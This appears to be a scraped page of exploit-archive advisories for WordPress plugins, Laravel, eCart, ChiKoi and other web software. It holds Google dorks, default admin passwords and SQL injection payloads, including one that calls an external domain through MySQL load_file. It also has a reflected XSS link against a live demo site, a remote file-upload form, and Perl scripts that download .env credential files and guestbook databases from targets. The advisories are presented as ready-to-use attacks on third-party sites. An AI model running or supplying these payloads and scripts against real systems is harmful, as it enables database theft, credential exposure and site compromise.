<pre><code>====================================================================================================================================<br />| # Title : WordPress profile builder 3.0.5 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit) | <br />| # Vendor : https://fr.wordpress.org/plugins/profile-builder/ | <br />| # Dork : " " |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/member_detail.php?id=1772 <====| inject here<br /><br />[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/login.php <====| Login<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : GLOBAL EDUCATION & TECHNOWORLD Version 4.1 unauthorized backup download Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.10(Pro) / browser : Mozilla firefox 108.0.2(32-bit) | <br />| # Vendor : https://globaledune.com/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The security vulnerability allows you to download a copy of the site's database, and of course it contains all tables, especially the admin column.<br /><br />[+] Use payload : /ims_panel/backup.php or /new/backup.php or /soft/backup.php<br /><br />[+] https://127.0.0.1/isoftcomputerin/ims_panel/backup.php<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Laravel from Version 1.0 to 9.47.0 MySQL Credential Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://laravel.com/ | <br />| # Dork : db_password filetype:env |<br /> "Whoops! There was an error." |<br />====================================================================================================================================<br /><br />note : <br /><br />[+] 1 : <br /> <br />Laravel's default .env file contains some common configuration values that may differ based on whether your application <br />is running locally or on a production web server. These values are then retrieved from various Laravel configuration files <br />within the config directory using Laravel's env function.<br /><br />[+] 2 : This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc<br /><br />[+] Poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /.env = ( Depending on the server's protection, the result of viewing the file is either direct viewing or downloading the file Or not give you anything )<br /><br />[+] https://127.0.0.1/lala/.env <br /><br />====================================================================================================================================<br />| # Title : Laravel from Version 1.0 to 9.47.0 sensitive information disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://laravel.com/ | <br />| # Dork : "Whoops! There was an error." |<br />====================================================================================================================================<br /><br />poc : <br /><br /><br />[+] This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] https://127.0.0.1/lalaland/categorie/avant_apres/<br /><br />[+] https://youtu.be/tz_w563Nyac <br /><br />====================================================================================================================================<br />| # Title : Laravel from Version 1.0 to 9.47.0 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://laravel.com | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the configuration file:<br /><br /> The following Perl exploit will attempt to download the .env file<br /> The .env file contains some common configuration values and connection information to the script database<br /> Through the code you can control where to save the downloaded file .<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br /># Author : indoushka<br /><br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print "\n[+] Laravel from Version 1.0 to 9.47.0 Database Disclosure [+] \n\n";<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[+] Author : indoushka \n\n";<br />print "[-] How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/.env \n";<br />print "[+] usage2 : perl $0 localhost /.env \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File=".env";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/.env");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/.env\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : 2ad guestbook version 2.0 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : http://www.2ad.free.fr | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl exploit will attempt to download the (livre-or.mdbsmdb.mdb ) file<br /> The (livre-or.mdbsmdb.mdb) It is the database and contains all the data .<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># 2ad guestbook version 2.0 Database Disclosure Exploit <br />#<br /># Author : indoushka<br />#<br /># Vondor : http://www.2ad.free.fr<br /> <br /> <br /> <br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print "\n[+] 2ad guestbook version 2.0 Database Disclosure Exploit [+] \n\n";<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-]How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="db/livre-or.mdbsmdb.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/livre-or.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/livre-or.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Gold Filled CRM v 2.0 Remote File Upload vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://codecanyon.net/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code upload your file remotely<br /><br />[+] infected file : /feltolt2.php .<br /><br />[+] This is the path where you will find your uploaded files ( product_images/original/)Exmpl : /product_images/original/index.svg<br /><br />[+] save code as poc.html .<br /><br /><br><br /> <br><br /> <br><br /> <br> <br /> <div class="center-block kozep"><br /> <br><br /> <br><br /> <center><br /> <h2>Képek felvitele</h2><br /> <br><br /> <br>Termék azonosítója : <br><br /> <br><br /> <form action="http://127.0.0.1/goldfilledhu/admin/feltolt2.php" method="post" enctype="multipart/form-data" action="http://127.0.0.1/goldfilledhu/admin/feltolt2.php"><input type="file" name="files[]" multiple="multiple" accept="image/*"><br><br /> <input name="send" type="submit" value="Feltölt"><br /> <input name="send" type="submit" value="Vissza"><br /> </form> <br /> <br><br /> <br></center><br /> </div> <br /> </body><br /> </html><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : ecartmultivendorweb.thewrteam.in │<br />│ Vendor : By WRTEAM Ekart.Com │<br />│ Software : eCart Web 5.0.0 - Multi Vendor eCommerce Marketplace │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />URL parameter 'category' is vulnerable to XSS<br /><br />Path: /shop<br /><br />https://ecartmultivendorweb.thewrteam.in/shop?category=baby-need-s-1su7mh%3cscript%3ealert(1)%3c%2fscript%3eg9eop&sub-category=test-1<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Foloosi Shopping v5.5.7 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit) | <br />| # Vendor : https://www.foloosishopping.com/ | <br />| # Dork : "category/beauty-health-hair" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=admin@example.com & pass=123456 <br /><br />[+] https://127.0.0.1/login<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Flex Version: 5.22 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://csimmobiliere.com | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=botble & pass=159357 <br /><br />[+] https://127.0.0.1/Flex/admin/login<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>## Title: ChiKoi-1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 01.12.2023<br />## Vendor: https://chikoiquan.tanhongit.com/<br />## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi<br /><br />## Description:<br />The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'<br />was submitted in the User-Agent HTTP header.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The attacker can steal all information from this system and can<br />seriously harm the users of this system,<br />such as extracting bank accounts through which they pay each other, etc.<br /><br />## STATUS: HIGH Vulnerability - CRITICAL<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: User-Agent (User-Agent)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)<br />Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND<br />9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION<br />SELECT 6994) END))-- -<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)<br />Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND<br />(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT<br />(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR<br />---<br />```<br />[+] Online:<br /><br />```MySQL<br />---<br />Parameter: User-Agent (User-Agent)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)<br />Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND<br />8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION<br />SELECT 6426) END))-- -<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/7x69yz)<br /><br />## Time spent<br />`01:30:00`<br /><br />## Writing an exploit<br />`00:05:00`<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DEPRIXA Pro V7.5 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://deprixacargo.link/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=admin & pass=09731 <br /><br />[+] https://127.0.0.1/deprixaprosite/demo/login.php<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>